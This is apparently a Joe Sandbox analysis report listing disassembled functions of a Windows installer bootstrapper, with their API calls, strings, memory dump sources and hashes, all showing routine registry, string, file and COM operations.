                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memcpy_s
                                                                                                                                                                    • String ID: crypt32.dll$wininet.dll
                                                                                                                                                                    • API String ID: 2001391462-82500532
                                                                                                                                                                    • Opcode ID: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
                                                                                                                                                                    • Instruction ID: 350dd18aa4ef67426c4fedcd1083d8ea5d98567584210f7493eeccb5ff08e2f3
                                                                                                                                                                    • Opcode Fuzzy Hash: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
                                                                                                                                                                    • Instruction Fuzzy Hash: 9E115E71700219AFCB08DE59CD959ABBF6DEF94794B14802AFC058B351D271EA10CAE0
                                                                                                                                                                    Function 009414F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00020006,00950D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0090F335,00000000,?,00020006), ref: 00941527
                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00020006,00950D10,00000000,?,?,0090F335,00000000,?,00020006,?,00950D10,00020006,00000000,?,?,?), ref: 00941557
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$Delete
                                                                                                                                                                    • String ID: regutil.cpp
                                                                                                                                                                    • API String ID: 1738766685-955085611
                                                                                                                                                                    • Opcode ID: a858ee52937b76a0aea16cdbfdb7fbe1c49ec0ae2ecd16046d5e727680f75299
                                                                                                                                                                    • Instruction ID: 952999c8c5ae2fd649c271a02e764815aa8b9ab3b6a51122665db590f67a0861
                                                                                                                                                                    • Opcode Fuzzy Hash: a858ee52937b76a0aea16cdbfdb7fbe1c49ec0ae2ecd16046d5e727680f75299
                                                                                                                                                                    • Instruction Fuzzy Hash: CA11C637D6113ABBDB318A948C05FEA7A28EB44770F154265FE02AA190E771CDA097E4
                                                                                                                                                                    Function 0092E06F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0092E40B
                                                                                                                                                                    • ___raise_securityfailure.LIBCMT ref: 0092E4F2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                    • String ID: b[ m
                                                                                                                                                                    • API String ID: 3761405300-1980045442
                                                                                                                                                                    • Opcode ID: b8d89b0c64baa34639a1bbfab2ebbd6cea41a06c7a19961e3d25780f9f896971
                                                                                                                                                                    • Instruction ID: 5196a6d3d84ffa8bb1aa482ef6eca1865c8ab845d4a1f292518bfe0884b37feb
                                                                                                                                                                    • Opcode Fuzzy Hash: b8d89b0c64baa34639a1bbfab2ebbd6cea41a06c7a19961e3d25780f9f896971
                                                                                                                                                                    • Instruction Fuzzy Hash: 2C211AB45283009EE700DF65FD95B5037A6FB48310F10506EE505AB3B0D7F46880EF46
                                                                                                                                                                    Function 0090DDB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,00927691,00000000,IGNOREDEPENDENCIES,00000000,?,0094B518), ref: 0090DE04
                                                                                                                                                                    Strings
                                                                                                                                                                    • IGNOREDEPENDENCIES, xrefs: 0090DDBB
                                                                                                                                                                    • Failed to copy the property value., xrefs: 0090DE38
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
                                                                                                                                                                    • API String ID: 1825529933-1412343224
                                                                                                                                                                    • Opcode ID: 147b53b4bbc90e73605349b4ba95c21469adf2e3cab0f1acd0fdca00d9f65001
                                                                                                                                                                    • Instruction ID: e2d7d4535a232755f735465d6b0b21fe77198f860494ea5dfcd194f763b0d9fa
                                                                                                                                                                    • Opcode Fuzzy Hash: 147b53b4bbc90e73605349b4ba95c21469adf2e3cab0f1acd0fdca00d9f65001
                                                                                                                                                                    • Instruction Fuzzy Hash: F411E532205215AFDB119FD4DC84FAAB7AAAF94320F254179FA18AF2D1C770A850CBC0
                                                                                                                                                                    Function 0094563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,00918E97,?,00000001,20000004,00000000,00000000,?,00000000), ref: 0094566E
                                                                                                                                                                    • SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00918E97,?), ref: 00945689
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoNamedSecuritySleep
                                                                                                                                                                    • String ID: aclutil.cpp
                                                                                                                                                                    • API String ID: 2352087905-2159165307
                                                                                                                                                                    • Opcode ID: cfb93f2b2a8e09d34e33fa3d3113d63772e3e5bbe724f175fcf29aa992342fdb
                                                                                                                                                                    • Instruction ID: fcb8640f2991f9ecace88f10411909fd5aad4a75a79a4912e042f6232f48dc37
                                                                                                                                                                    • Opcode Fuzzy Hash: cfb93f2b2a8e09d34e33fa3d3113d63772e3e5bbe724f175fcf29aa992342fdb
                                                                                                                                                                    • Instruction Fuzzy Hash: 0C015B37801929BBCF229FC9CD09E9E7B69EF88760F474255BD0466221C6328D20EBD0
                                                                                                                                                                    Function 0090158C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LCMapStringW.KERNEL32(0000007F,00000000,00000000,009170E8,00000000,009170E8,00000000,00000000,009170E8,00000000,00000000,00000000,?,00902318,00000000,00000000), ref: 009015D0
                                                                                                                                                                    • GetLastError.KERNEL32(?,00902318,00000000,00000000,009170E8,00000200,?,009452B2,00000000,009170E8,00000000,009170E8,00000000,00000000,00000000), ref: 009015DA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastString
                                                                                                                                                                    • String ID: strutil.cpp
                                                                                                                                                                    • API String ID: 3728238275-3612885251
                                                                                                                                                                    • Opcode ID: 1fd976e19b00fad12309ef5e48c299411d382d717fb08e7c0e2d8e87285378c4
                                                                                                                                                                    • Instruction ID: 6dac37d502e165d2292a1cd1fe35903b158d1429fff8228b520310d086573bdf
                                                                                                                                                                    • Opcode Fuzzy Hash: 1fd976e19b00fad12309ef5e48c299411d382d717fb08e7c0e2d8e87285378c4
                                                                                                                                                                    • Instruction Fuzzy Hash: 3901D43794163A7FCB228E998C44E5B7BADEF86B70B054224FE10AF290D721DC1087E0
                                                                                                                                                                    Function 009157BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000), ref: 009157D9
                                                                                                                                                                    • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 00915833
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to initialize COM on cache thread., xrefs: 009157E5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeUninitialize
                                                                                                                                                                    • String ID: Failed to initialize COM on cache thread.
                                                                                                                                                                    • API String ID: 3442037557-3629645316
                                                                                                                                                                    • Opcode ID: 0af7b46778c6f706481d8d79498006fe5505762e68952a3f48a3c397db463da7
                                                                                                                                                                    • Instruction ID: 3dbe46726ba5438df1ddedaa254440d74c5595464f769f0bbed08fde9010891c
                                                                                                                                                                    • Opcode Fuzzy Hash: 0af7b46778c6f706481d8d79498006fe5505762e68952a3f48a3c397db463da7
                                                                                                                                                                    • Instruction Fuzzy Hash: 2F018B72201619BFC7008FA5D880EDAFBACFF48354B018126FA19C7121CB30AD54CB90
                                                                                                                                                                    Function 00943BF1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00943A8E,?), ref: 00943C62
                                                                                                                                                                    Strings
                                                                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00943C0C
                                                                                                                                                                    • EnableLUA, xrefs: 00943C34
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpen
                                                                                                                                                                    • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                                                                    • API String ID: 47109696-3551287084
                                                                                                                                                                    • Opcode ID: 041835b202df6dde54644facd19c630f0ccf460b9e56dfc25eebee054d3bd856
                                                                                                                                                                    • Instruction ID: d0148f0db4ce42beeb76f11362ef2c2924889db1d0d2dd56cf45a8a5bcd4739a
                                                                                                                                                                    • Opcode Fuzzy Hash: 041835b202df6dde54644facd19c630f0ccf460b9e56dfc25eebee054d3bd856
                                                                                                                                                                    • Instruction Fuzzy Hash: B1017C32D10238FBD7209AB4D846FAEF7ACDB54726F2085A5AD40B3011D3755E5096D0
                                                                                                                                                                    Function 00905123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00901104,?,?,00000000), ref: 00905142
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00901104,?,?,00000000), ref: 00905172
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareStringlstrlen
                                                                                                                                                                    • String ID: burn.clean.room
                                                                                                                                                                    • API String ID: 1433953587-3055529264
                                                                                                                                                                    • Opcode ID: da0cf0de1a8b3772666198666fa99b8f201dd6857d4956632c5e0635f28825f2
                                                                                                                                                                    • Instruction ID: 4686e046517205dcbd87220a6f666a84abe4095755b32310dc0c1888cf4bec0c
                                                                                                                                                                    • Opcode Fuzzy Hash: da0cf0de1a8b3772666198666fa99b8f201dd6857d4956632c5e0635f28825f2
                                                                                                                                                                    • Instruction Fuzzy Hash: 3D01AD7261C6206FC7308B88AC84E33BBADEB197A0B11411BF809D3660C3B0EC41DFA1
                                                                                                                                                                    Function 00946920 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00946985
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                    • String ID: `<u$atomutil.cpp
                                                                                                                                                                    • API String ID: 3341692771-4051019476
                                                                                                                                                                    • Opcode ID: 9f99ad7eaec944c9c927c0b264295d229048407d1c5cc6a22a172889562a091f
                                                                                                                                                                    • Instruction ID: 465befa3c4003ab96d21e1db92f766fa9b840f3ee80f7708a7d530d6b244940b
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f99ad7eaec944c9c927c0b264295d229048407d1c5cc6a22a172889562a091f
                                                                                                                                                                    • Instruction Fuzzy Hash: EC01F4B6804118FBCB325A958C05FAEF7BDAF86B21F254155B80066150C7F68E00E7E2
                                                                                                                                                                    Function 00906522 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00906534
                                                                                                                                                                      • Part of subcall function 00940ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00905EB2,00000000), ref: 00940AE0
                                                                                                                                                                      • Part of subcall function 00940ACC: GetProcAddress.KERNEL32(00000000), ref: 00940AE7
                                                                                                                                                                      • Part of subcall function 00940ACC: GetLastError.KERNEL32(?,?,?,00905EB2,00000000), ref: 00940AFE
                                                                                                                                                                      • Part of subcall function 00905CE2: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00905D68
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set variant value., xrefs: 00906571
                                                                                                                                                                    • Failed to get 64-bit folder., xrefs: 00906557
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                    • String ID: Failed to get 64-bit folder.$Failed to set variant value.
                                                                                                                                                                    • API String ID: 3109562764-2681622189
                                                                                                                                                                    • Opcode ID: c54bbc6078d869e3bab012b54d1692dd0f3e351f377f0377d499c5d21d962067
                                                                                                                                                                    • Instruction ID: 080368fc951a184f394bd279cf1250ee07a7a3611d903c54df40da8cf329a2d7
                                                                                                                                                                    • Opcode Fuzzy Hash: c54bbc6078d869e3bab012b54d1692dd0f3e351f377f0377d499c5d21d962067
                                                                                                                                                                    • Instruction Fuzzy Hash: 6E016D32D02628BFCB21ABA0DD06E9EBB7CEF44721F114196F900A6195D7719F60DBD0
                                                                                                                                                                    Function 009033C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,009010DD,?,00000000), ref: 009033E8
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,009010DD,?,00000000), ref: 009033FF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastModuleName
                                                                                                                                                                    • String ID: pathutil.cpp
                                                                                                                                                                    • API String ID: 2776309574-741606033
                                                                                                                                                                    • Opcode ID: c7a1868e1fcbf9c05733308b85b357ebd736bae31abe71cbbd185dac9c381213
                                                                                                                                                                    • Instruction ID: af97c7ad1f5edefc8384b2cde73173bf65d9cdd20e865d3ae2e7b0ed1a2c97c1
                                                                                                                                                                    • Opcode Fuzzy Hash: c7a1868e1fcbf9c05733308b85b357ebd736bae31abe71cbbd185dac9c381213
                                                                                                                                                                    • Instruction Fuzzy Hash: CEF0F673A485356FC332569A9C49E9BFA5CEB86B70B528121FE04BF190DB60DD0082E0
                                                                                                                                                                    Function 0092E30F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0092EBD2
                                                                                                                                                                      • Part of subcall function 00931380: RaiseException.KERNEL32(?,?,?,0092EBF4,?,00000000,00000000,?,?,?,?,?,0092EBF4,?,00967EC8), ref: 009313DF
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0092EBEF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                                                                    • Opcode ID: c086a457aa753ee8f10da5ababf6b840f6214100ed49b081e348d3b217df6215
                                                                                                                                                                    • Instruction ID: c475f30fb299322601a5d43384b5ce8b5ba91ab4a2fad3213da1205baa6e9236
                                                                                                                                                                    • Opcode Fuzzy Hash: c086a457aa753ee8f10da5ababf6b840f6214100ed49b081e348d3b217df6215
                                                                                                                                                                    • Instruction Fuzzy Hash: 57F0223480031CBACF00FAA5F89AFADB36C4A80350F504561FC24924E9EB30EE19CAD0
                                                                                                                                                                    Function 00944A05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,00000000,00000000,74DF34C0,?,?,?,0090BA1D,?,?,?,00000000,00000000), ref: 00944A1D
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,0090BA1D,?,?,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00944A27
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastSize
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 464720113-2967768451
                                                                                                                                                                    • Opcode ID: 9968dc78c23f9b7b0465baea52df15f12b8ccde6f0c5cfaf865619f3fb6c53ae
                                                                                                                                                                    • Instruction ID: 15b178577ca9bbf0aa82fd0ae550b8d68f602c88e5ef3107dd31e9076a0fc6e2
                                                                                                                                                                    • Opcode Fuzzy Hash: 9968dc78c23f9b7b0465baea52df15f12b8ccde6f0c5cfaf865619f3fb6c53ae
                                                                                                                                                                    • Instruction Fuzzy Hash: E3F0C277A5423AAB97208F89C905E5AFBACFF44B20F01811AFD44A7300E770AD00CBD4
                                                                                                                                                                    Function 00943D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36comCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,00905466,?,00000000,00905466,?,?,?), ref: 00943DA7
                                                                                                                                                                    • CoCreateInstance.OLE32(00000000,00000000,00000001,0096716C,?), ref: 00943DBF
                                                                                                                                                                    Strings
                                                                                                                                                                    • Microsoft.Update.AutoUpdate, xrefs: 00943DA2
                                                                                                                                                                    Memory Dump Source
